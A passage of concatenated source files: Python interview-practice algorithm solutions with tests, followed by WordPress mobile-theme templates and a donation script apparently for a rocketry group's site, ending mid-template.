def choose_ice_cream_once(self, money):
diff_to_cost = {}
for i in range(0, len(self.ice_cream_costs)):
cost = self.ice_cream_costs[i]
if cost in diff_to_cost:
return diff_to_cost[cost], i
else:
diff = money - cost
diff_to_cost[diff] = i
class IceCreamChooseManyVisits(IceCreamChooser):
def __init__(self, ice_cream_costs):
super(IceCreamChooseManyVisits, self).__init__(ice_cream_costs)
self.all_possible_costs_sums = self.preprocess_ice_cream_costs()
def preprocess_ice_cream_costs(self):
all_possible_costs_sums = {}
for i in range(0, len(self.ice_cream_costs)):
for j in range(i + 1, len(self.ice_cream_costs)):
costs_sum = self.ice_cream_costs[i] + self.ice_cream_costs[j]
all_possible_costs_sums[costs_sum] = (i, j)
return all_possible_costs_sums
def choose_ice_cream_once(self, money):
return self.all_possible_costs_sums[money]
def choose_ice_cream_flavours(ice_cream_costs, money_sums):
if len(money_sums) >= len(ice_cream_costs):
return IceCreamChooseManyVisits(ice_cream_costs).choose_ice_cream(money_sums)
else:
return IceCreamChooseLimitedVisits(ice_cream_costs).choose_ice_cream(money_sums)
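The limited-visits chooser is a variant of the classic one-pass hash-map two-sum; a standalone sketch of that core idea (the helper name is an assumption, not from the original):

```python
def two_sum(costs, target):
    # Remember each cost's index; when the complement of the current cost
    # has been seen before, the pair sums to the target.
    seen = {}
    for i, cost in enumerate(costs):
        if target - cost in seen:
            return seen[target - cost], i
        seen[cost] = i
    return None
```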
def run_tests():
assert choose_ice_cream_flavours([2, 5, 3, 1], [3, 8]) == [(0, 3), (1, 2)]
assert choose_ice_cream_flavours([2, 5, 3, 1], [3, 8, 7, 6, 5]) == [(0, 3), (1, 2), (0, 1), (1, 3), (0, 2)]
assert choose_ice_cream_flavours([2, 5, 3.5, 4, 4.5, 1.5, 2.5, 0.5], [3, 8]) == [(6, 7), (2, 4)]
assert choose_ice_cream_flavours([1, 2, 3], [3, 3, 3, 4, 5, 3, 4]) == [(0, 1), (0, 1), (0, 1), (0, 2), (1, 2),
(0, 1), (0, 2)]
assert choose_ice_cream_flavours([2, 5, 3.5, 4, 4.5, 1.5, 2.5, 0.5], [3.5]) == [(0,5)]
if __name__ == '__main__':
run_tests()
<file_sep>/ProfilingExample/rate_tweets.py
import pandas as pd
import timeit
class Fields:
LIKES_FIELD = 'nlikes'
POPULARITY_FIELD = 'tweet_popularity'
def rate_tweet_popularity(num_likes):
if num_likes <= 50:
return 'low'
if 50 < num_likes <= 500:
return 'medium'
if num_likes > 500:
return 'high'
def run_with_iter(df):
tweet_popularity = []
for i, row in df.iterrows():
tweet_popularity.append(rate_tweet_popularity(row[Fields.LIKES_FIELD]))
df[Fields.POPULARITY_FIELD] = tweet_popularity
def run_with_apply(df):
df[Fields.POPULARITY_FIELD] = df.apply(lambda row: rate_tweet_popularity(row[Fields.LIKES_FIELD]), axis=1)
def run_with_vectors(df):
df[Fields.POPULARITY_FIELD] = 0
df.loc[(df[Fields.LIKES_FIELD] <= 50), Fields.POPULARITY_FIELD] = 'low'
df.loc[(50 < df[Fields.LIKES_FIELD]) & (df[Fields.LIKES_FIELD] <= 500), Fields.POPULARITY_FIELD] = 'medium'
df.loc[(df[Fields.LIKES_FIELD] > 500), Fields.POPULARITY_FIELD] = 'high'
if __name__ == '__main__':
data_set = pd.read_csv('~/Downloads/elon-musk/2020.csv')
print("Method run_with_vectors finished in", timeit.timeit(
"run_with_vectors(data_set)", globals=globals(), number=1
), "seconds")
print("Popularity results: \n", data_set[Fields.POPULARITY_FIELD].value_counts())
<file_sep>/bit_manipulation/check_all_bits_set.py
def exact_bit_set(x, y, z):
n1 = 1 << (x - 1)
n2 = 1 << (y - 1)
N = n1 | n2
return z == N
def run_tests():
assert exact_bit_set(2, 8, 20) is False
assert exact_bit_set(1, 3, 20) is False
assert exact_bit_set(1, 3, 5) is True
assert exact_bit_set(1, 11, 1025) is True
if __name__ == '__main__':
run_tests()
<file_sep>/bit_manipulation/find_single_number.py
def find_single_number(arr):
result = arr[0]
for n in arr[1:]:
result = result ^ n
return result
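The XOR fold can also be written as a one-liner via the standard library (an equivalent sketch, not part of the original file):

```python
from functools import reduce
import operator

def find_single_number_reduce(arr):
    # XOR every element together: paired values cancel out, the lone value survives.
    return reduce(operator.xor, arr)
```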
def run_tests():
arr = [0]
assert find_single_number(arr) == 0
arr = [1, 1, 2, 3, 3]
assert find_single_number(arr) == 2
arr = [2, 1, 1, 3, 3, 1, 1]
assert find_single_number(arr) == 2
if __name__ == '__main__':
run_tests()
<file_sep>/hello_world/hello_world_python.py
def hello_world():
space_counter = 0
s = "Hello World"
for c in s:
print(" " * space_counter + c)
space_counter += 1
if __name__ == '__main__':
hello_world()<file_sep>/Mastermind/app/game_logic/checkers.py
from collections import Counter
def check_player_guess_no_duplicates(code, guess):
code_set = set(code)
bul = 0
pgia = 0
for i in range(0, len(guess)):
color = guess[i]
if color == code[i]:
bul += 1
elif color in code_set:
pgia += 1
return bul, pgia
def check_player_guess_with_duplicates(code, guess):
code_counter = Counter(code)
bul = 0
pgia = 0
for i in range(0, len(guess)):
color = guess[i]
if color == code[i]:
bul += 1
decrease_color(code_counter, color)
for i in range(0, len(guess)):
color = guess[i]
if color in code_counter:
pgia += 1
decrease_color(code_counter, color)
return bul, pgia
def decrease_color(code_counter, color):
if color in code_counter:
updated_color_count = code_counter.pop(color) - 1
if updated_color_count > 0:
code_counter[color] = updated_color_count
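The duplicate-aware scoring can be expressed compactly with `Counter` intersection; this is an equivalent sketch (function name is an assumption), not the original implementation:

```python
from collections import Counter

def check_guess_counter(code, guess):
    # bul: exact positional matches.
    bul = sum(1 for c, g in zip(code, guess) if c == g)
    # Multiset intersection counts every color overlap once per occurrence;
    # subtracting bul leaves the right-color-wrong-place count (pgia).
    overlap = sum((Counter(code) & Counter(guess)).values())
    return bul, overlap - bul
```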
<file_sep>/longest_k_unique.py
# Related blog post - https://algoritmim.co.il/2019/07/04/k-unique-sequence/
import copy
from collections import defaultdict
def find_longest_k_unique(arr, k):
longest_k_unique = []
if len(arr) == 1:
return arr
else:
i = j = 0
current_k_unique = [arr[i]]
current_range = defaultdict(int)
current_range[arr[i]] += 1
unique_count = len(current_range.keys())
while j < len(arr)-1:
if unique_count <= k:
j += 1
current_k_unique.append(arr[j])
current_range[arr[j]] += 1
else:
del current_k_unique[0]
current_range[arr[i]] -= 1
if current_range[arr[i]] == 0:
current_range.pop(arr[i])
i += 1
unique_count = len(current_range.keys())
if unique_count == k:
if len(current_k_unique) > len(longest_k_unique):
longest_k_unique = copy.deepcopy(current_k_unique)
return longest_k_unique
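The same problem is often solved with a sliding window over indices instead of copying the current run; this alternative sketch (not the original's approach) tracks only the best window's bounds:

```python
from collections import defaultdict

def longest_k_unique_window(arr, k):
    # Grow the right edge; shrink from the left whenever more than k
    # distinct values are inside the window.
    counts = defaultdict(int)
    best_start, best_end = 0, 0
    left = 0
    for right, val in enumerate(arr):
        counts[val] += 1
        while len(counts) > k:
            counts[arr[left]] -= 1
            if counts[arr[left]] == 0:
                del counts[arr[left]]
            left += 1
        if len(counts) == k and right + 1 - left > best_end - best_start:
            best_start, best_end = left, right + 1
    return arr[best_start:best_end]
```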
def run_tests():
arr = [1, 5, 3, 100, 3, 2, 2]
k=1
assert find_longest_k_unique(arr, k) == [2,2]
k=2
assert find_longest_k_unique(arr, k) == [3,100,3]
k = 3
assert find_longest_k_unique(arr, k) == [3,100,3,2,2]
arr = [1, 2, 3, 4]
k=1
assert find_longest_k_unique(arr,k) == [2]
k=2
assert find_longest_k_unique(arr,k) == [1,2]
if __name__ == '__main__':
run_tests()<file_sep>/maze.py
# Related blog post - https://algoritmim.co.il/2019/06/18/maze-path/
class MazeCell(object):
def __init__(self, i, j, is_wall=False, is_exit=False):
self.i = i
self.j = j
self.visited = False
self.is_wall = is_wall
self.is_exit = is_exit
def __eq__(self, other):
return self.i == other.i and self.j == other.j
def __repr__(self):
repr = "%d,%d" % (self.i, self.j)
if self.visited:
repr += ',visited'
if self.is_exit:
repr += ' (EXIT)'
return repr
class Maze(object):
def __init__(self, maze_matrix):
self.maze = maze_matrix
self.cells_cache = {}
self.rows = len(maze_matrix)
self.columns = len(maze_matrix[0])
def find_path_to_exit_in_maze(self, start_cell):
path = [start_cell]
while len(path) > 0:
current_cell = path[-1]
current_cell.visited = True
adjacent_cell = self.get_available_adjacent_cell(current_cell)
if adjacent_cell is None:
path.pop()
else:
path.append(adjacent_cell)
if adjacent_cell.is_exit:
return path
return -1
def get_cell(self, i, j):
if (i,j) not in self.cells_cache:
self.cells_cache[(i,j)] = MazeCell(i, j, self.maze[i][j] == 1, self.maze[i][j] == "EXIT")
return self.cells_cache[(i,j)]
def get_available_adjacent_cell(self, cell):
for (i, j) in [(cell.i - 1, cell.j), (cell.i, cell.j - 1), (cell.i + 1, cell.j), (cell.i, cell.j + 1)]:
if 0 <= i < self.rows and 0 <= j < self.columns:
adj = self.get_cell(i,j)
if adj.visited or adj.is_wall:
continue
else:
return adj
return None
def run_tests():
maze_matrix = [[1, "ENTRANCE", 1, 1],
[1, 0, 0, 1],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 1), MazeCell(1, 1), MazeCell(2, 1), MazeCell(3, 1), MazeCell(3, 2),
MazeCell(4, 2, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == expected_path
maze_matrix = [[1, "ENTRANCE", 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == -1
maze_matrix = [[1, "ENTRANCE", 1, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == -1
maze_matrix = [[1, "ENTRANCE", 1, 1],
[1, "EXIT", 1, 1]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 1), MazeCell(1, 1, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == expected_path
maze_matrix = [["ENTRANCE", 0, 0, "EXIT"]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 0), MazeCell(0, 1), MazeCell(0, 2), MazeCell(0,3, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 0)) == expected_path
if __name__ == '__main__':
run_tests()
<file_sep>/README.md
# maya_solves
Solutions to programming problems
This repository holds solutions and tests to programming problems I solved practicing for job interviews!
Full written steps to solutions (in Hebrew) can be found here -
https://algoritmim.co.il
Enjoy!
<file_sep>/hello_world/hello_world_python_rec.py
def print_diag(spaces, word):
if len(word) > 0:
print(spaces + word[0])
print_diag(spaces + " ", word[1:])
if __name__ == '__main__':
print_diag("", "Hello World!")
<file_sep>/multiply.py
# Related blog post -
def multiply(x,y):
return x * y
def run_tests():
assert multiply(5,5) == 25
assert multiply(0,5) == 0
assert multiply(1,5) == 5
assert multiply(-5,5) == -25
assert multiply(0.5,5) == 2.5
if __name__ == '__main__':
run_tests()
<file_sep>/merge_meetings.py
# Related blog post - https://algoritmim.co.il/2019/07/06/merge-meetings/
class Meeting(object):
def __init__(self, start, end):
self.start_time = start
self.end_time = end
def __lt__(self, other):
return self.start_time < other.start_time
def __eq__(self, other):
return self.start_time == other.start_time and self.end_time == other.end_time
def __repr__(self):
return "(%d,%d)" % (self.start_time, self.end_time)
def merge_meetings(arr):
if len(arr) <= 1:
return arr
arr.sort()
res = [arr[0]]
previous_meeting = arr[0]
for i in range(1, len(arr)):
new_meeting = arr[i]
if new_meeting.start_time <= previous_meeting.end_time:
previous_meeting.end_time = max(previous_meeting.end_time, new_meeting.end_time)
else:
res.append(new_meeting)
previous_meeting = new_meeting
return res
def run_tests():
arr = [Meeting(3, 4), Meeting(0, 2)]
assert merge_meetings(arr) == [Meeting(0, 2), Meeting(3, 4)]
arr = [Meeting(3, 4), Meeting(0, 2), Meeting(1, 3)]
assert merge_meetings(arr) == [Meeting(0, 4)]
arr = [Meeting(0, 1), Meeting(3, 5), Meeting(4, 8), Meeting(10, 12), Meeting(9, 10)]
assert merge_meetings(arr) == [Meeting(0, 1), Meeting(3, 8), Meeting(9, 12)]
if __name__ == '__main__':
run_tests()
<file_sep>/bit_manipulation/get_revers_bits.py
def reverse_bits(x):
result = 0
for i in range(0, 32):
current_bit = x >> i & 1
result = result | current_bit << (32 - i - 1)
return result
def run_tests():
assert reverse_bits(0) == 0
assert reverse_bits(1) == pow(2, 31)
assert reverse_bits(pow(2, 31)) == 1
assert reverse_bits(pow(2, 31) + 1) == pow(2, 31) + 1
if __name__ == '__main__':
run_tests()
<file_sep>/code_jam/2018/senate_evacuation.py
# Related blog post - https://algoritmim.co.il/2019/11/23/senate-evacuation/
import string
def remove_senators(senators_counter, senators_to_evict):
for senator in senators_to_evict:
senators_counter[senator] -= 1
if senators_counter[senator] == 0:
senators_counter.pop(senator)
def format_results(eviction_plan_list):
eviction_plan_list = ["".join(senators) for senators in eviction_plan_list]
return " ".join(eviction_plan_list)
def choose_next_to_evict(senators_counter):
if len(senators_counter) == 2:
return list(senators_counter.keys())
else:
return [max(senators_counter, key=senators_counter.get)]
def evict_the_senate_iter(senators_counter):
eviction_plan = []
while len(senators_counter) > 0:
senators_to_evict = choose_next_to_evict(senators_counter)
remove_senators(senators_counter, senators_to_evict)
eviction_plan.append(senators_to_evict)
return format_results(eviction_plan)
if __name__ == '__main__':
num_test_cases = int(input())
for i in range(1, num_test_cases + 1):
num_parties = int(input())
parties = [c for c in string.ascii_uppercase[:num_parties]]
senators_count_per_party = [int(s) for s in input().split(" ")]
counter = dict(zip(parties, senators_count_per_party))
print("Case #{}: {}".format(i, evict_the_senate_iter(counter)))
<file_sep>/last_word.py
# Related blog post - https://algoritmim.co.il/2019/06/18/last-word/
def find_last_word(s):
last_word = ""
i = len(s) - 1
while i >= 0 and s[i] == " ":
i -= 1
while i >= 0 and s[i] != " ":
last_word = s[i] + last_word
i -= 1
return last_word
def run_tests():
assert find_last_word("") == ""
assert find_last_word(" ") == ""
assert find_last_word("a") == "a"
assert find_last_word("dog ") == "dog"
assert find_last_word("hello world") == "world"
if __name__ == '__main__':
run_tests()
<repo_name>copsub/wp-touch-copsub<file_sep>/copsub/default/template_the-team.php
<?php
/*
Template Name: The Team Template
*/
?>
<?php get_header();
global $post;
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<section class="text">
<?php
echo '<div class="personnel"><h3>Mission Specialists</h3></div>';
$type = 'personel';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'ignore_sticky_posts' => 1, // 'caller_get_posts' was deprecated in WP 3.1
'orderby' => 'title',
'order' => 'ASC',
'team' => 'mission-specialists' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$job_area_personel = get_field( '_job_area', get_the_id() );
?>
<div style="width:330px; float: left; margin-bottom: 20px;" class="personnel">
<div style="float:left; margin-right:20px;" class="personnel-img">
<?php
if ( has_post_thumbnail() ) { // inside the loop; $_post was undefined here
the_post_thumbnail( array(100, 100) ); // the_post_thumbnail() echoes by itself
} else {
echo '<img width="100" height="100" src="' . get_site_url() . '/wp-content/themes/cphsuborbitals/img/siluet.jpg" class="personnel-siluet" alt="siluet">';
}
?>
</div>
<div style="margin-top:5px;">
<div style="font-size: 18px; font-weight: bold;"><?php the_title(); ?></div>
<div style="font-weight: bold; color:#777"><?php echo $job_area_personel; ?></div>
</div>
</div>
<?php
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo '<div class="personnel" style="clear: both;"><h3>Support Group</h3></div>';
$type = 'personel';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'ignore_sticky_posts' => 1, // 'caller_get_posts' was deprecated in WP 3.1
'orderby' => 'title',
'order' => 'ASC',
'team' => 'support-group' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$job_area_personel = get_field( '_job_area', get_the_id() );
?>
<div style="width:330px; float: left; margin-bottom: 20px;" class="personnel">
<div style="float:left; margin-right:20px;" class="personnel-img">
<?php
if ( has_post_thumbnail() ) { // inside the loop; $_post was undefined here
the_post_thumbnail( array(100, 100) ); // the_post_thumbnail() echoes by itself
} else {
echo '<img width="100" height="100" src="' . get_site_url() . '/wp-content/themes/cphsuborbitals/img/siluet.jpg" class="personnel-siluet" alt="siluet">';
}
?>
</div>
<div style="margin-top:5px;">
<div style="font-size: 18px; font-weight: bold;"><?php the_title(); ?></div>
<div style="font-weight: bold; color:#777"><?php echo $job_area_personel; ?></div>
</div>
</div>
<?php
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
?>
<div style="clear: both;"></div>
</section>
</div>
</div>
</div>
<?php get_footer(); ?>
<file_sep>/copsub/default/header.php
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<title><?php wp_title( ' | ', true, 'right' ); ?></title>
<?php wptouch_head(); ?>
<?php
if ( !is_single() && !is_archive() && !is_page() && !is_search() ) {
wptouch_canonical_link();
}
if ( isset( $_REQUEST[ 'wptouch_preview_theme' ] ) || isset( $_REQUEST[ 'wptouch_switch' ] ) ) {
echo '<meta name="robots" content="noindex" />';
}
?>
<style>
<?php
// Dynamic styles for the mobile theme
$background_image_magnification = 160;
$background_image_front_section_1 = get_field( 'background_image_front_section_1', 'option' );
$background_image_front_section_1_ratio = ($background_image_front_section_1['height']/$background_image_front_section_1['width'])*($background_image_magnification-1);
$background_image_front_section_2_ratio = (1306/1800)*($background_image_magnification-1);
$background_image_front_section_3_ratio = (1200/1800)*($background_image_magnification-1);
$background_image_front_section_4_ratio = (3850/1800)*($background_image_magnification-1);
$background_image_front_section_5_ratio = (699/1800)*($background_image_magnification-1);
?>
<!--
.wrapper_front_section_1 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo $background_image_front_section_1['url'] ?>');
}
.wrapper_front_section_1:after {
padding-top: <?php echo $background_image_front_section_1_ratio; ?>%;
}
.main_front_section_1_overlay_3 {
}
.wrapper_front_section_2 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-top-bck.jpg');
}
.wrapper_front_section_2:after {
padding-top: <?php echo $background_image_front_section_2_ratio; ?>%;
}
.main_front_big_button_S2O3_1 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/donatesquare.png');
background-size: 40%;
background-position: right bottom;
background-repeat: no-repeat;
}
.main_front_big_button_S2O3_2 {
}
.main_front_big_button_S2O3_3 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/square_download.png');
background-size: 40%;
background-position: right bottom;
background-repeat: no-repeat;
}
.wrapper_front_section_3 {
}
.wrapper_front_section_3:after {
padding-top: <?php echo $background_image_front_section_3_ratio; ?>%;
}
.wrapper_front_section_4 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-spica-bck.jpg');
}
.wrapper_front_section_4:after {
padding-top: <?php echo $background_image_front_section_4_ratio; ?>%;
}
.wrapper_front_section_5 {
background-size:<?php echo $background_image_magnification ?>% !important;
background-color: #000;
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/front-bottom-bck.jpg');
}
.wrapper_front_section_5:after {
padding-top: <?php echo $background_image_front_section_5_ratio; ?>%;
}
.main_front_section_5_overlay_2 {
background-image:url('<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/donatebutton.png');
background-size: contain;
background-position: center center;
background-repeat: no-repeat;
}
-->
</style>
</head>
<body <?php body_class( wptouch_get_body_classes() ); ?>>
<?php do_action( 'wptouch_preview' ); ?>
<?php do_action( 'wptouch_body_top' ); ?>
<?php get_template_part( 'header-bottom' ); ?>
<?php do_action( 'wptouch_body_top_second' ); ?>
<file_sep>/copsub/default/donation.js
jQuery.get("http://ipinfo.io", function (response) {
if (response.country == "DK") {
jQuery("#currency_code").val("DKK");
}
if (response.country == "DE") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "SE") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "NO") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "ES") {
jQuery("#currency_code").val("EURO");
}
if (response.country == "US") {
jQuery("#currency_code").val("USD");
}
}, "jsonp");
function payWithBankTransferCallback(data){
jQuery('#bank-transfer-modal-content').html('<h1>Thank you for your donation!<br/></h1><h3>Please check your email.</h3>');
}
function payWithBankTransfer(){
if (jQuery('#amount-field').val() == ''){
alert('Please enter an amount');
return;
}
var data = { action: 'dgx_donate_bank_transfer', email: jQuery('#bank-transfer-email').val(), amount: jQuery('#amount-field').val(), currency: jQuery('#currency_code').val(), monthly: jQuery('#supporter').is(":checked") };
jQuery.post( '/wp-admin/admin-ajax.php', data, payWithBankTransferCallback );
jQuery('#bank-transfer-modal-content').html('<h3>Loading...</h3>');
return false;
}
function payWithPaypalCallback(data){
// Copy the encrypted string into the form field
jQuery('#encrypted-field').val(data);
// Submit the form to Paypal
jQuery('#paypal-form').submit();
}
function payWithPaypal(){
if (jQuery('#amount-field').val() == ''){
alert('Please enter an amount');
return;
}
var data = { action: 'dgx_donate_paypal', amount: jQuery('#amount-field').val(), currency: jQuery('#currency_code').val(), monthly: jQuery('#supporter').is(":checked") };
jQuery.post( '/wp-admin/admin-ajax.php', data, payWithPaypalCallback );
return false;
}
<file_sep>/copsub/default/mission_template.php
<?php
/*
Template Name: Mission Landingpage Template (Mobile)
*/
?>
<?php get_header();
$server_name = $_SERVER['SERVER_NAME'];
$themepath = ( $server_name === 'sb1.local' ? 'http://sb1.local/wp-content/themes/cphsuborbitals' : CHILD_THEME_URI );
global $post;
$frontpage_id = get_option('page_on_front');
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
$mission_live_blog = get_field( 'mission_live_blog', $post->ID );
$about_the_mission_title = get_field( 'about_the_mission_title', 'option' );
$about_the_mission_content = get_field( 'about_the_mission_content', 'option' );
//var from settings page
$launch_time_date = get_field( 'launch_time_date', 'option' );
$launch_date = date('F jS', strtotime($launch_time_date));
$launch_message = get_field( 'front_launch_message', 'option' );
$time_hiding_countdown_frontpage = get_field( 'time_hiding_countdown_frontpage', 'option' );
$show_countdown_on_frontpage = get_field( 'show_countdown_on_frontpage', 'option' );
$activate_war_mode = get_field( 'activate_war_mode', 'option' );
$mission_landing_page_title_l1_normal_mode = get_field( 'mission_landing_page_title_l1_normal_mode', 'option' );
$mission_landing_page_title_l2_normal_mode = get_field( 'mission_landing_page_title_l2_normal_mode', 'option' );
$mission_landing_page_title_l1_war_mode = get_field( 'mission_landing_page_title_l1_war_mode', 'option' );
$mission_landing_page_title_l2_war_mode = get_field( 'mission_landing_page_title_l2_war_mode', 'option' );
$mission_landing_page_top_logo = get_field( 'mission_landing_page_top_logo', 'option' );
$mission_content_top = get_field( 'mission_content_top', 'option' );
$estimated_mission_plan = get_field( 'estimated_mission_plan', 'option' );
$live_blog_description = get_field( 'live_blog_description', 'option' );
$for_the_press_content = get_field( 'for_the_press_content', 'option' );
$more_about_image = get_field( 'more_about_image', 'option' );
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<?php while ( have_posts() ) : the_post(); ?>
<div class="post-page-content">
<section class="text">
<?php
/* SUB HEADER SECTION START ---------------------------------------------------------------------------------------------------------------------------- */
if ( $activate_war_mode ) {
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw;">
<tr>
<td style="height: 15vw;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 6.5vw;"><?php echo $mission_landing_page_title_l1_war_mode ?></div>
<div style="Color:#FF4F00; Font-size:3.5vw;font-weight: bold; line-height: 4.0vw;"><?php echo $mission_landing_page_title_l2_war_mode ?></div>
</td>
<td style="text-align:right; width: 25vw;">
<img src="<?php echo $mission_landing_page_top_logo[url] ?>" style="height:15vw;">
</td>
</tr>
<tr>
<td colspan="2" style="height: 5vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999">
</td>
</tr>
</table>
<?php } else { ?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw;">
<tr>
<td style="height: 15vw;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 6.5vw;"><?php echo $mission_landing_page_title_l1_normal_mode ?></div>
<div style="Color:#FF4F00; Font-size:3.5vw;font-weight: bold; line-height: 4.0vw;"><?php echo $mission_landing_page_title_l2_normal_mode ?></div>
</td>
<td style="text-align:right; width: 25vw;">
<img src="<?php echo $mission_landing_page_top_logo[url] ?>" style="height:15vw;">
</td>
</tr>
<tr>
<td colspan="2" style="height: 15vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999">
<div style="padding-top: 1.0vw;"><?php echo $mission_content_top ?></div>
</td>
</tr>
</table>
<?php
}
/* SUB HEADER SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
if ( $activate_war_mode ) {
/* LIVESTREAM SECTION START ---------------------------------------------------------------------------------------------------------------------------- */
?>
<iframe width="878" height="494" src="https://www.youtube.com/embed/<?php echo $url_for_steaming_link; ?>?rel=0&showinfo=0" frameborder="0" allowfullscreen></iframe>
<?php
/* LIVESTREAM SECTION END ----------------------------------------------------------------------------------------------------------------------------- */
}
if ( $activate_war_mode ) {
/* LIVEBLOG SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7;margin-top:1vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<div style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 8.5vw;padding-right: 10px;">Live blog</div>
<div style="Color:black; Font-size:3.5vw;font-weight: normal;line-height: 4.5vw;"><?php echo $live_blog_description ?></div>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php the_content(); ?>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1.0vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 4.5vw;padding-right: 1.0vw;">For the press</span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $for_the_press_content ?>
</td>
</tr>
</table>
<?php
/* LIVEBLOG SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
} else {
/* NEWS SECTION START --------------------------------------------------------------------------------------------------------------------------------- */
$query = new WP_Query( array(
'no_found_rows' => true, // counts posts, remove if pagination required
'update_post_meta_cache' => false, // grabs post meta, remove if post meta required
'update_post_term_cache' => false, // grabs terms, remove if terms required (category, tag...)
'post_type' => array( 'post' ),
'posts_per_page' => 3,
'category_name' => 'nexoe_news',
'orderby' => 'date'
) );
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7">
<tr>
<td style="height: 27.0vw; padding: 0 0 1.0vw 0;" >
<div class="latest_news">
<ul style="list-style: none; margin: 0;">
<?php if ( $query->have_posts() ) :
while ( $query->have_posts() ) : $query->the_post(); ?>
<li style="margin: 0 0.5vw 0 0.5vw; ">
<?php
printf( '<div class="missionnews"><div style="padding-top: 1vw;">%s</div><a href="%s">%s</a></div>', get_the_date( 'd.m.Y' ), get_permalink(), get_the_title() );
printf( '<div>%s</div>', wp_trim_words( strip_tags( get_the_content( '', TRUE ) ), 20 ) );
?>
</li>
<?php endwhile;
endif;
wp_reset_postdata();
?>
</ul>
</div>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1vw;">
<tr>
<td style=" padding: 2.0vw 1.0vw 1.0vw 1.0vw;">
<?php echo $estimated_mission_plan ?>
</td>
</tr>
</table>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; background-color: #e7e7e7; margin-top: 1.0vw;">
<tr>
<td style="height: 6.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 4.5vw;padding-right: 1.0vw;">For the press</span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 2.0vw 1.0vw 1.0vw 1.0vw;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $for_the_press_content ?>
</td>
</tr>
</table>
<?php
/* NEWS SECTION END --------------------------------------------------------------------------------------------------------------------------------- */
}
/* NEWSLETTER-DONATE SECTION START -------------------------------------------------------------------------------------------------------------------- */
if ( 1 ) {
?>
<table style="width: 100%; background-color: #FF4F00; margin-bottom:1vw;margin-top:1vw;">
<tr>
<td style="height: 8.0vw; padding: 2.3vw 1.0vw 2.0vw 1.0vw;text-align: center;" >
